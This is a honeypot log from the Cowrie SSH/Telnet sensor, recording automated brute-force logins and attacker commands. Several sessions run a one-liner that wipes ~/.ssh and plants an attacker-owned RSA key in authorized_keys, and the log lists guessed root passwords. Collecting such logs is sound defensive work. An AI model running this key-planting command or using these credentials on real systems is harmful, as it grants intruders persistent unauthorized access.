{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:29:05.487454Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:29:05.488113Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:29:05.489245Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:05.865519Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:29:06.634130Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:29:06.634833Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:29:07.017940Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:07.018813Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37654,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba818bf445f6","protocol":"ssh","message":"New connection: 212.227.235.229:37654 (1.2.3.4:22) [session: ba818bf445f6]","sensor":"my-vps","timestamp":"2025-09-09T02:29:07.388269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:29:07.396111Z","src_ip":"212.227.235.229","session":"ba818bf445f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:29:07.769863Z","src_ip":"212.227.235.229","session":"ba818bf445f6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:29:09.266126Z","src_ip":"212.227.235.229","session":"ba818bf445f6"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:10.641280Z","src_ip":"212.227.235.229","session":"ba818bf445f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39162,"dst_ip":"1.2.3.4","dst_port":22,"session":"f21958b2993f","protocol":"ssh","message":"New connection: 212.227.235.229:39162 (1.2.3.4:22) [session: f21958b2993f]","sensor":"my-vps","timestamp":"2025-09-09T02:29:11.021973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:29:11.022603Z","src_ip":"212.227.235.229","session":"f21958b2993f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:29:11.408761Z","src_ip":"212.227.235.229","session":"f21958b2993f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:29:12.979965Z","src_ip":"212.227.235.229","session":"f21958b2993f"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:13.363544Z","src_ip":"212.227.235.229","session":"580de0916d9c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:13.364699Z","src_ip":"212.227.235.229","session":"f21958b2993f"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11759,"dst_ip":"1.2.3.4","dst_port":22,"session":"10c00956136a","protocol":"ssh","message":"New connection: 185.152.45.241:11759 (1.2.3.4:22) [session: 10c00956136a]","sensor":"my-vps","timestamp":"2025-09-09T02:29:23.609410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:29:23.610229Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:29:23.659211Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.login.success","username":"root","password":"pclinux","message":"login attempt [root/pclinux] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:29:23.919393Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:29:24.083375Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:29:24.084072Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:29:24.085472Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:24.134790Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:29:24.307118Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:29:24.307830Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:29:24.354731Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:24.355700Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11754,"dst_ip":"1.2.3.4","dst_port":22,"session":"33c0f9b31f94","protocol":"ssh","message":"New connection: 185.152.45.241:11754 (1.2.3.4:22) [session: 33c0f9b31f94]","sensor":"my-vps","timestamp":"2025-09-09T02:29:24.394423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:29:24.395986Z","src_ip":"185.152.45.241","session":"33c0f9b31f94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:29:24.448479Z","src_ip":"185.152.45.241","session":"33c0f9b31f94"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:29:24.679254Z","src_ip":"185.152.45.241","session":"33c0f9b31f94"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:25.724510Z","src_ip":"185.152.45.241","session":"33c0f9b31f94"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11764,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac89b021350d","protocol":"ssh","message":"New connection: 185.152.45.241:11764 (1.2.3.4:22) [session: ac89b021350d]","sensor":"my-vps","timestamp":"2025-09-09T02:29:25.774496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:29:25.775385Z","src_ip":"185.152.45.241","session":"ac89b021350d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:29:25.834204Z","src_ip":"185.152.45.241","session":"ac89b021350d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:29:26.060132Z","src_ip":"185.152.45.241","session":"ac89b021350d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:26.109647Z","src_ip":"185.152.45.241","session":"10c00956136a"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:26.110842Z","src_ip":"185.152.45.241","session":"ac89b021350d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49934,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c92cd519381","protocol":"ssh","message":"New connection: 212.227.235.229:49934 (1.2.3.4:22) [session: 8c92cd519381]","sensor":"my-vps","timestamp":"2025-09-09T02:29:32.979473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:29:32.981277Z","src_ip":"212.227.235.229","session":"8c92cd519381"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:29:33.285791Z","src_ip":"212.227.235.229","session":"8c92cd519381"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"Password1","message":"login attempt [jenkins/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:29:34.509392Z","src_ip":"212.227.235.229","session":"8c92cd519381"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:29:35.818638Z","src_ip":"212.227.235.229","session":"8c92cd519381"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58918,"dst_ip":"1.2.3.4","dst_port":23,"session":"90fa503beb93","protocol":"telnet","message":"New connection: 212.227.125.160:58918 (1.2.3.4:23) [session: 90fa503beb93]","sensor":"my-vps","timestamp":"2025-09-09T02:30:02.024152Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48904,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dc769e969d9","protocol":"ssh","message":"New connection: 212.227.235.229:48904 (1.2.3.4:22) [session: 6dc769e969d9]","sensor":"my-vps","timestamp":"2025-09-09T02:30:05.493915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:30:05.496320Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:30:05.738313Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123456!","message":"login attempt [root/admin123456!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:30:06.725469Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:30:07.241444Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:30:07.242150Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
